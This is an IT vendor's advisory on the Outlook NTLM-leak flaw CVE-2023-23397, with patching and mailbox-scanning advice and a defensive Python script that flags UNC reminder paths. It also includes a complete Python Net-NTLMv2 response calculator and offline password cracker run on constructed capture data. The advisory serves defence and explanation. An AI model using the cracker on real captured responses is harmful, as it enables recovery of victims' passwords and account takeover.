A critical Microsoft Outlook for Windows vulnerability (CVE-2023-23397) has been disclosed that lets an attacker steal NTLM credential material from a victim simply by sending them an email.

Microsoft released a fix for the vulnerability on Patch Tuesday, March 14, 2023. All supported versions of Outlook for Windows are affected by the flaw, which Microsoft classifies as an elevation-of-privilege vulnerability with a CVSS score of 9.8 (critical).

Using nothing more than a crafted phishing email, an attacker can capture the target's NTLM credentials (the Net-NTLMv2 challenge response). No user interaction is required: the exploit fires when the Outlook client processes the message and the reminder it carries triggers, so the victim does not need to open or even preview the email.

Critical Microsoft Outlook Vulnerability

Simple Exploitation

Windows New Technology LAN Manager (NTLM) is a challenge-response authentication protocol used in Windows domains. Instead of sending a password, the client proves that it knows the password's hash.

Despite its well-known weaknesses, NTLM is still enabled on current systems to remain compatible with legacy software and devices.

When a client connects to a resource such as an SMB share, the server sends it a challenge and the client answers with a response computed from its NTLM password hash. If an attacker captures that exchange, they can either crack the response offline to recover the password or relay it to another server that accepts NTLM, authenticating as the victim without ever learning the password.

Microsoft explained that delivering “a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server” will allow an attacker to leverage CVE-2023-23397 to collect NTLM hashes.

“The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication” – Microsoft
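The following is an added worked example, not code from Mirazon or from Microsoft, showing what a rogue SMB server like the one Microsoft describes actually receives: the client's Net-NTLMv2 response, computed from the NT hash (MD4 of the UTF-16LE password) and a server challenge that the attacker chooses. Because every input except the password is known to the attacker, the captured response can be guessed against offline; relaying it, as Microsoft notes, needs no cracking at all. The user, domain, challenge, client blob and wordlist are constructed for the demo; the MD4 routine is included because hashlib's MD4 is frequently disabled under OpenSSL 3.

```python
import hashlib
import hmac
import struct

_M32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _M32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), the digest underlying the NT hash."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for f, order, shifts, k in rounds:
            for i, j in enumerate(order):
                t = (-i) % 4                      # register updated this step: a, d, c, b, ...
                b, c, d = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = _rotl((s[t] + f(b, c, d) + x[j] + k) & _M32, shifts[i % 4])
        state = [(u + v) & _M32 for u, v in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The NT hash Windows stores: unsalted MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 response key: HMAC-MD5(NT hash, UPPER(user) || domain), per MS-NLMP 3.3.2."""
    key_input = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), key_input, hashlib.md5).digest()


def ntlmv2_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(key, server challenge || client blob). The client sends
    proof || blob in its authenticate message; a rogue server on TCP 445 logs both."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def crack_ntlmv2(user, domain, server_challenge, blob, captured_proof, wordlist):
    """Offline guessing against a captured response. Each candidate costs one MD4 and
    two HMAC-MD5 operations; returns the recovered password or None."""
    for guess in wordlist:
        proof = ntlmv2_proof(guess, user, domain, server_challenge, blob)
        if hmac.compare_digest(proof, captured_proof):
            return guess
    return None


# Constructed "capture" standing in for what the attacker's SMB server would log.
VICTIM_USER, VICTIM_DOMAIN = "jdoe", "CORP"
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")          # chosen by the attacker's server
CLIENT_BLOB = (bytes.fromhex("0101000000000000")              # NTLMv2 blob header (constructed)
               + bytes.fromhex("00d0b8a1e4a4d901")            # timestamp field (constructed)
               + bytes.fromhex("aabbccddeeff0011")            # client nonce (constructed)
               + b"\x00" * 4)
# What the victim's Outlook/SMB client would have sent; simulated here with the real password.
CAPTURED_PROOF = ntlmv2_proof("Summer2023!", VICTIM_USER, VICTIM_DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB)
WORDLIST = ["password", "Welcome1", "Summer2023!", "P@ssw0rd"]        # constructed wordlist


def demo():
    return crack_ntlmv2(VICTIM_USER, VICTIM_DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB, CAPTURED_PROOF, WORDLIST)


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered password:", demo())
```

Because the NT hash is unsalted and MD4 plus HMAC-MD5 are fast, guessing rates on commodity GPUs are high enough that weak domain passwords captured this way are routinely recovered; this is why the fix and the mailbox sweep matter even where NTLM relay is blocked by SMB signing.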


What You Should Do

This is a critical Microsoft Outlook vulnerability, and we recommend immediate action.

Microsoft provides a script, CVE-2023-23397.ps1, that checks on-premises and Exchange Online mailboxes for every message item carrying the PidLidReminderFileParameter property (the property the exploit abuses to point the reminder sound at an attacker's share). When it completes, it writes a CSV if any were found. In the PidLidReminderFileParameter column, look for anything that points off the machine. Entries such as reminder.wav are normal. What you do not want to see is a UNC path to a host name such as host.domain.com or to an IP address. If any are found, keep those rows in a CSV as evidence, run the script again instructing it to clean, and treat the affected mailbox owners' credentials as potentially exposed (the reminder may already have fired), not just as something to tidy up.

Administrators are strongly advised to prioritize patching CVE-2023-23397 and to use Microsoft's script to look for indications of exploitation by confirming whether any messaging objects in Exchange carry a UNC path.
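As an added example (not part of Microsoft's script or of this article), here is a small triage helper that applies the rule above to the CSV the script produces: it flags rows whose PidLidReminderFileParameter value is a UNC path and distinguishes IP-address targets from host-name targets. The only column name it relies on is PidLidReminderFileParameter, which the article names; the other columns and all rows in the sample are constructed, and the IP and host used are documentation addresses.

```python
import csv
import io
import ipaddress
import sys


def classify_reminder_path(value: str) -> str:
    """Classify one PidLidReminderFileParameter value.

    Returns 'empty', 'local' (bare file name or drive path, e.g. reminder.wav),
    'unc-ip' or 'unc-host'. UNC forms like \\\\host@80\\share (WebDAV) are handled
    by stripping the @port suffix before the host is examined.
    """
    v = (value or "").strip()
    if not v:
        return "empty"
    if v.startswith("\\\\"):
        host = v[2:].split("\\", 1)[0].split("@", 1)[0]
        try:
            ipaddress.ip_address(host)
            return "unc-ip"
        except ValueError:
            return "unc-host"
    return "local"


def triage_csv(text: str):
    """Return the rows whose reminder path points off the machine, tagged with the class."""
    hits = []
    for row in csv.DictReader(io.StringIO(text)):
        kind = classify_reminder_path(row.get("PidLidReminderFileParameter", ""))
        if kind.startswith("unc-"):
            hits.append({**row, "Classification": kind})
    return hits


# Constructed sample of what the script's CSV could look like; column names other than
# PidLidReminderFileParameter are assumed, and the mailboxes/hosts are fictitious.
SAMPLE_CSV = r"""Mailbox,Subject,PidLidReminderFileParameter
alice@example.com,Quarterly review,reminder.wav
bob@example.com,Invoice 4411,\\203.0.113.25\share\ding.wav
carol@example.com,Team lunch,
dave@example.com,Urgent,\\files.example.net@80\pub\bell.wav
"""


def main(path=None):
    text = open(path, encoding="utf-8-sig").read() if path else SAMPLE_CSV
    hits = triage_csv(text)
    for h in hits:
        print(f"{h['Classification']:9} {h.get('Mailbox', '?'):24} {h['PidLidReminderFileParameter']}")
    return hits


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it against the script's CSV (`python triage.py results.csv`) and hand the printed rows to whoever runs the cleanup pass. A UNC path to an internal file server is not proof of attack, but it is not a value Outlook sets on its own either, so every hit deserves a look.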

Microsoft notes that its online services, such as Microsoft 365 itself, do not support NTLM authentication and so cannot be attacked with these messages, and that Outlook on the web, Outlook for Mac, iOS and Android are not affected. The vulnerability lives in the Outlook for Windows desktop client, however, so a Microsoft 365 mailbox read through that client is still exploitable; that is why the script checks Exchange Online mailboxes as well as on-premises ones.

Mirazon will be glad to assist in any way necessary to help keep your business and IT environment protected through the use of Layered Security Strategy. Reach out to us if you’d like to learn more by using the information below!

If you’d like assistance dealing with this critical Microsoft Outlook vulnerability, please contact us by calling (502) 240-0404 or emailing info@mirazon.com.